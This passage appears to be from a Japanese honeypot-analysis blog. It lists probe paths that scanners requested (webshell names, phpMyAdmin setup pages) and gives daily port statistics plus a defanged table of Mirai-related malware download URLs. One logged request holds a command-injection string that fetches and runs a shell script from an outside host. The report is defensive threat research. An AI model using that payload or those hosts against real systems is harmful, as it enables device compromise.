9月5日 POST /db_desql.php
9月5日 POST /db_session.init.php
9月5日 POST /default.php
9月5日 POST /defect.php
9月5日 POST /fack.php
9月5日 POST /feixiang.php
9月5日 POST /h1.php
9月5日 POST /help.php
9月5日 POST /hh.php
9月5日 POST /hm.php
9月5日 POST /images.php
9月5日 POST /infoo.php
9月5日 POST /ip.php
9月5日 POST /l7.php
9月5日 POST /l8.php
9月5日 POST /lindex.php
9月5日 POST /linuxse.php
9月5日 POST /log.php
9月5日 POST /m.php?pbid=open
9月5日 POST /min.php
9月5日 POST /mx.php
9月5日 POST /mz.php
9月5日 POST /pe.php
9月5日 POST /phpStudy.php
9月5日 POST /phpinfi.php
9月5日 POST /post.php
9月5日 POST /python.php
9月5日 POST /q.php
9月5日 POST /qaq.php
9月5日 POST /qq.php
9月5日 POST /qwe.php
9月5日 POST /s.php
9月5日 POST /sean.php
9月5日 POST /sheep.php
9月5日 POST /ssaa.php
9月5日 POST /system.php
9月5日 POST /test.php
9月5日 POST /tiandi.php
9月5日 POST /w.php
9月5日 POST /wan.php
9月5日 POST /wanan.php
9月5日 POST /wc.php
9月5日 POST /webslee.php
9月5日 POST /weixiao.php
9月5日 POST /wp-admins.php
9月5日 POST /wshell.php
9月5日 POST /wuwu11.php
9月5日 POST /xiao.php
9月5日 POST /xiaoma.php
9月5日 POST /xiaomae.php
9月5日 POST /xiaomar.php
9月5日 POST /xshell.php
9月5日 POST /xw.php
9月5日 POST /xw1.php
9月5日 POST /xx.php
9月5日 POST /xz.php
9月5日 POST /yao.php
9月5日 POST /yumo.php
9月5日 POST /zshmindex.php
9月5日 POST /zuo.php
9月5日 POST /zuoindex.php
9月5日 POST /zuoshou.php
9月5日 PROPFIND /
9月6日 GET /
9月6日 GET /1AS/index.jsp
9月6日 GET /1q/index.jsp
9月6日 GET /2323633/index.jsp
9月6日 GET /51/index.jsp
9月6日 GET /511/index.jsp
9月6日 GET /5211111111111/index.jsp
9月6日 GET /AAAAAAAAAAAAAAAAAAAAuper/index.jsp
9月6日 GET /Anzzpo/index.jsp
9月6日 GET /Aqwe/index.jsp
9月6日 GET /CluJaNul/index.jsp
9月6日 GET /EWFQ/index.jsp
9月6日 GET /FA/index.jsp
9月6日 GET /Fendou/index.jsp
9月6日 GET /Fido/index.jsp
9月6日 GET /JSP/index.jsp
9月6日 GET /JuLiAn/index.jsp
9月6日 GET /Liutao/index.jsp
9月6日 GET /Memory/index.jsp
9月6日 GET /Micrsyse2m/index.jsp
9月6日 GET /MyAdmin/scripts/setup.php
9月6日 GET /Mytomcat/index.jsp
9月6日 GET /PMA/index.php
9月6日 GET /PMA2/index.php
9月6日 GET /QQ374666283/index.jsp
9月6日 GET /QQ443076142/index.jsp
9月6日 GET /QQ563332298AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/index.jsp
9月6日 GET /QQ727095531/index.jsp
9月6日 GET /QQPP/index.jsp
9月6日 GET /SQLL/index.jsp
9月6日 GET /Tomcatmansagxesaasxsas/index.jsp
9月6日 GET /Xs/index.jsp
9月6日 GET /_query.php
9月6日 GET /admin/PMA/index.php
9月6日 GET /admin/assets/js/views/login.js
9月6日 GET /admin/index.php
9月6日 GET /admin/mysql/index.php
9月6日 GET /admin/mysql2/index.php
9月6日 GET /admin/phpMyAdmin/index.php
9月6日 GET /admin/phpmyadmin2/index.php
9月6日 GET /ak/index.jsp
9月6日 GET /apach/index.jsp
9月6日 GET /apache-tomcat/index.jsp
9月6日 GET /apache-web/index.jsp
9月6日 GET /appserv.php
9月6日 GET /apptor/index.jsp
9月6日 GET /asd/index.jsp
9月6日 GET /black/index.jsp
9月6日 GET /chaochao/index.jsp
9月6日 GET /china/index.jsp
9月6日 GET /chuan/index.jsp
9月6日 GET /claroline/phpMyAdmin/index.php
9月6日 GET /cmd.php
9月6日 GET /cmd/index.jsp
9月6日 GET /cmd2/index.jsp
9月6日 GET /cmdd.php
9月6日 GET /cmv.php
9月6日 GET /cmx.php
9月6日 GET /cwx/index.jsp
9月6日 GET /dan/index.jsp
9月6日 GET /db/index.php
9月6日 GET /db_cts.php
9月6日 GET /db_pma.php
9月6日 GET /dbadmin/index.php
9月6日 GET /desktop.ini.php
9月6日 GET /dingfan/index.jsp
9月6日 GET /dream/index.jsp
9月6日 GET /emperor/index.jsp
9月6日 GET /emperor3/index.jsp
9月6日 GET /f4ck/index.jsp
9月6日 GET /feng/index.jsp
9月6日 GET /fuckxue/index.jsp
9月6日 GET /goc-vpn/index.jsp
9月6日 GET /gxjsp/index.jsp
9月6日 GET /hacks/index.jsp
9月6日 GET /hcskk/index.jsp
9月6日 GET /hell.php
9月6日 GET /help-e.php
9月6日 GET /help.php
9月6日 GET /host-mana/index.jsp
9月6日 GET /ht/index.jsp
9月6日 GET /hua/index.jsp
9月6日 GET /iesvc/index.jsp
9月6日 GET /index.php
9月6日 GET /java.php
9月6日 GET /javi/index.jsp
9月6日 GET /javi100/index.jsp
9月6日 GET /jc/index.jsp
9月6日 GET /jo3/index.jsp
9月6日 GET /king/index.jsp
9月6日 GET /knal.php
9月6日 GET /koko/index.jsp
9月6日 GET /lala-dpr.php
9月6日 GET /lala.php
9月6日 GET /license.php
9月6日 GET /lincogo/index.jsp
9月6日 GET /log.php
9月6日 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
9月6日 GET /logon.php
9月6日 GET /lol.php
9月6日 GET /looky/index.jsp
9月6日 GET /manager/html
9月6日 GET /maque6695940/index.jsp
9月6日 GET /maque66959401/index.jsp
9月6日 GET /memimi/index.jsp
9月6日 GET /muhstik-dpr.php
9月6日 GET /muhstik.php
9月6日 GET /muhstik2.php
9月6日 GET /muhstiks.php
9月6日 GET /myadmin/index.php
9月6日 GET /myadmin2/index.php
9月6日 GET /mysql-admin/index.php
9月6日 GET /mysql/index.php
9月6日 GET /mysql/scripts/setup.php
9月6日 GET /mysqladmin/index.php
9月6日 GET /mysqladmin/scripts/setup.php
9月6日 GET /mzy/index.jsp
9月6日 GET /osu/index.jsp
9月6日 GET /phpMyAdmin.old/index.php
9月6日 GET /phpMyAdmin/index.php
9月6日 GET /phpMyAdmin/phpMyAdmin/index.php
9月6日 GET /phpMyAdmin/scripts/setup.php
9月6日 GET /phpMyAdminold/index.php
9月6日 GET /phpMyadmin_bak/index.php
9月6日 GET /phpadmin/index.php
9月6日 GET /phpma/index.php
9月6日 GET /phpmyadmin-old/index.php
9月6日 GET /phpmyadmin0/index.php
9月6日 GET /phpmyadmin1/index.php
9月6日 GET /phpmyadmin2/index.php
9月6日 GET /piaomiao111/index.jsp
9月6日 GET /pma-old/index.php
9月6日 GET /pma/scripts/setup.php
9月6日 GET /pmamy/index.php
9月6日 GET /pmamy2/index.php
9月6日 GET /pmd/index.php
9月6日 GET /pmd_online.php
9月6日 GET /private/index.jsp
9月6日 GET /qidai/index.jsp
9月6日 GET /qjhq/index.jsp
9月6日 GET /rf/index.jsp
9月6日 GET /rrr/index.jsp
9月6日 GET /rte/index.jsp
9月6日 GET /safe/index.jsp
9月6日 GET /safe2/index.jsp
9月6日 GET /safee/index.jsp
9月6日 GET /safepp/index.jsp
9月6日 GET /scripts/setup.php
9月6日 GET /servletc-eavmple/index.jsp
9月6日 GET /shell.php
9月6日 GET /shijian/index.jsp
9月6日 GET /shl/index.jsp
9月6日 GET /soft/index.jsp
9月6日 GET /supsz/index.jsp
9月6日 GET /synsuper/index.jsp
9月6日 GET /synsupesssssssssssssssr/index.jsp
9月6日 GET /sysadmin/index.jsp
9月6日 GET /system/index.jsp
9月6日 GET /system2/index.jsp
9月6日 GET /systems/index.jsp
9月6日 GET /tao/index.jsp
9月6日 GET /taoge/index.jsp
9月6日 GET /temps/index.jsp
9月6日 GET /test.php
9月6日 GET /text.php
9月6日 GET /tomcat-5.5.26/index.jsp
9月6日 GET /tools/phpMyAdmin/index.php
9月6日 GET /typo3/phpmyadmin/index.php
9月6日 GET /uploader.php
9月6日 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
9月6日 GET /wangbaba110/index.jsp
9月6日 GET /wavce/index.jsp
9月6日 GET /web/phpMyAdmin/index.php
9月6日 GET /webd/index.jsp
9月6日 GET /webdav/
9月6日 GET /webdax/index.jsp
9月6日 GET /webdoc/index.jsp
9月6日 GET /webex/index.jsp
9月6日 GET /webshell/index.jsp
9月6日 GET /wholove/index.jsp
9月6日 GET /win/index.jsp
9月6日 GET /win88/index.jsp
9月6日 GET /wo/index.jsp
9月6日 GET /wp-config.php
9月6日 GET /wpo.php
9月6日 GET /ww/index.jsp
9月6日 GET /www/phpMyAdmin/index.php
9月6日 GET /x.php
9月6日 GET /xampp/phpmyadmin/index.php
9月6日 GET /xhzz/index.jsp
9月6日 GET /xiaodama/index.jsp
9月6日 GET /xiaohui/index.jsp
9月6日 GET /xiaomo/index.jsp
9月6日 GET /xiaon/index.jsp
9月6日 GET /xiaowu/index.jsp
9月6日 GET /xiaozhe/index.jsp
9月6日 GET /xinsui/index.jsp
9月6日 GET /z.php
9月6日 GET /zhu/index.jsp
9月6日 GET /zman/index.jsp
9月6日 GET /zxc/index.jsp
9月6日 GET @research.aegis.network/
9月6日 HEAD hxxp://180.163.113[.]82/check_proxy
9月6日 OPTIONS *
9月6日 POST /12.php
9月6日 POST /1213.php
9月6日 POST /3.php
9月6日 POST /56.php
9月6日 POST /9510.php
9月6日 POST /9678.php
9月6日 POST /aaaa.php
9月6日 POST /ak.php
9月6日 POST /ak47.php
9月6日 POST /ak48.php
9月6日 POST /angge.php
9月6日 POST /aotu.php
9月6日 POST /app.php
9月6日 POST /aw.php
9月6日 POST /bak.php
9月6日 POST /boots.php
9月6日 POST /cainiao.php
9月6日 POST /ceshi.php
9月6日 POST /cmd.php
9月6日 POST /conflg.php
9月6日 POST /data.php
9月6日 POST /db.init.php
9月6日 POST /db__.init.php
9月6日 POST /db_dataml.php
9月6日 POST /db_desql.php
9月6日 POST /db_session.init.php
9月6日 POST /default.php
9月6日 POST /defect.php
9月6日 POST /fack.php
9月6日 POST /feixiang.php
9月6日 POST /h1.php
9月6日 POST /help.php
9月6日 POST /hh.php
9月6日 POST /hm.php
9月6日 POST /infoo.php
9月6日 POST /ip.php
9月6日 POST /l6.php
9月6日 POST /l7.php
9月6日 POST /l8.php
9月6日 POST /lindex.php
9月6日 POST /linuxse.php
9月6日 POST /log.php
9月6日 POST /m.php?pbid=open
9月6日 POST /miao.php
9月6日 POST /min.php
9月6日 POST /mx.php
9月6日 POST /mz.php
9月6日 POST /pe.php
9月6日 POST /phpStudy.php
9月6日 POST /phpinfi.php
9月6日 POST /post.php
9月6日 POST /python.php
9月6日 POST /q.php
9月6日 POST /qaq.php
9月6日 POST /qq.php
9月6日 POST /qwe.php
9月6日 POST /s.php
9月6日 POST /sean.php
9月6日 POST /she.php
9月6日 POST /sheep.php
9月6日 POST /ssaa.php
9月6日 POST /system.php
9月6日 POST /test.php
9月6日 POST /tiandi.php
9月6日 POST /w.php
9月6日 POST /wan.php
9月6日 POST /wanan.php
9月6日 POST /wc.php
9月6日 POST /webslee.php
9月6日 POST /weixiao.php
9月6日 POST /wp-admins.php
9月6日 POST /wshell.php
9月6日 POST /wuwu11.php
9月6日 POST /xiao.php
9月6日 POST /xiaoma.php
9月6日 POST /xiaomae.php
9月6日 POST /xiaomar.php
9月6日 POST /xshell.php
9月6日 POST /xw.php
9月6日 POST /xw1.php
9月6日 POST /xx.php
9月6日 POST /xz.php
9月6日 POST /yao.php
9月6日 POST /yumo.php
9月6日 POST /zshmindex.php
9月6日 POST /zuo.php
9月6日 POST /zuoindex.php
9月6日 POST /zuoshou.php
9月6日 PROPFIND /

 

以上、簡易分析でした。

ハニーポット簡易分析(25日目:9/2)

9/2 分のハニーポット簡易分析となります。今回、Splunkのサーチ文を工夫したため、分析に必要なデータ収集が約半分程度で終わりました。分析方法についてはどこかで書きたいなーと思っています。

Honeytrap
検知数:3,359件
<宛先ポート別 TOP10>

ポート 件数 割合 サービス
445 1,657 49.33% SMB
3389 74 2.20% RDP
52869 70 2.08% D-Link, Realtek SDK
22 65 1.94% SSH
1911 63 1.88% Arctic
81 47 1.40% ?
1433 46 1.37% Microsoft SQL Server
3350 44 1.31% ?
53 32 0.95% DNS
8080 32 0.95% PROXY

 

 <マルウェアダウンロード>

ダウンロード先 ポート番号 パス 検知数 リンク
hxxp://107[.]191[.]99[.]41/elf[.]mips 52869 POST /picsdesc.xml 22 https://www.virustotal.com/#/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/detection
hxxp://148[.]72[.]176[.]78/ngynx 8081  POST /HNAP1/ 3 https://www.virustotal.com/#/file/ef7e4a132f5abff4f5a404fc9966a6c566a67bd5561b5134ff75ff3c3a2578c5/detection
hxxp://185[.]10[.]68[.]127/rtbin 52869 POST /picdesc.xml  1 https://www.virustotal.com/#/file/86df8e90a8731340b5612b497fec61423582c0afd6280867db13cd46d4727c0b/detection
hxxp://185[.]10[.]68[.]127/rtbin zz POST /wanipcn.xml  1 https://www.virustotal.com/#/file/86df8e90a8731340b5612b497fec61423582c0afd6280867db13cd46d4727c0b/detection
hxxp://185[.]162[.]130[.]187/adbs2 5555   1 https://www.virustotal.com/#/url/57ec0260337088aff2a7d4eadcf1407022fadefdb2e5dae3539abc22e8a9b76c/detection
hxxp://185[.]244[.]25[.]201/bins/salvia[.]mips 52869 POST /picsdesc.xml 1 https://www.virustotal.com/#/url/29a9057aa1200bf48e87142a2d3daff2e1d4cb690f43baae0d8e4fb866f02752/detection
hxxp://185[.]62[.]189[.]149/adbs2 5555   1 https://www.virustotal.com/#/url/dfa0fb0a5116828aeb427a4d66302c0a96e4ade45a057557024b92a020903882/detection
hxxp://206[.]189[.]237[.]137/bins/hoho[.]mips 52869 POST /picsdesc.xml 3 https://www.virustotal.com/#/file/46b4712087dc711de6072bcdf5e945381baa4cb5cf239ba734c79c47d835ca54/detection
hxxp://207[.]148[.]78[.]152/bc 5555   3 https://www.virustotal.com/#/file/46b4712087dc711de6072bcdf5e945381baa4cb5cf239ba734c79c47d835ca54/detection
hxxp://27[.]102[.]115[.]44/adbs2 5555    6 https://www.virustotal.com/#/file/46b4712087dc711de6072bcdf5e945381baa4cb5cf239ba734c79c47d835ca54/detection
hxxp://46[.]101[.]250[.]21/8mips8[.]mips 52869 POST /picsdesc.xml 11 https://www.virustotal.com/#/url/fc2370cb5255365a03956def4019bdf886b2c73669065855d519971088eb9e4e/detection
hxxp://76[.]74[.]170[.]223/shit[.]mips 52869  POST /wanipcn.xml 1 https://www.virustotal.com/#/file/3e874b965844ac82a5f1d479ab1113ea4385f5ed82a2d7b3e243b44273a1a658/detection
hxxp://77[.]87[.]77[.]250/izuku[.]mips 8081 POST /HNAP1/  1 https://www.virustotal.com/#/file/200d5e1ebc293af0ed4974d6f40a129f7488cf88a6984c5feebe0c0e30baadb3/detection
hxxp://77[.]87[.]77[.]250/izuku[.]mips 8081 POST /HNAP1/ 5 https://www.virustotal.com/#/file/200d5e1ebc293af0ed4974d6f40a129f7488cf88a6984c5feebe0c0e30baadb3/detection
hxxp://80[.]211[.]112[.]150/mips 52869 POST /picsdesc.xml  1 https://www.virustotal.com/#/file/23a576856c353a434f8edf1d42c3c46beb48e8d39931043847ed193377decafe/detection

マルウェアはいつも通り、Mirai関連でした。なかなか、他のマルウェアは出てきませんが、のんびりと待ちたいと思います。

 

以上、簡易分析でした。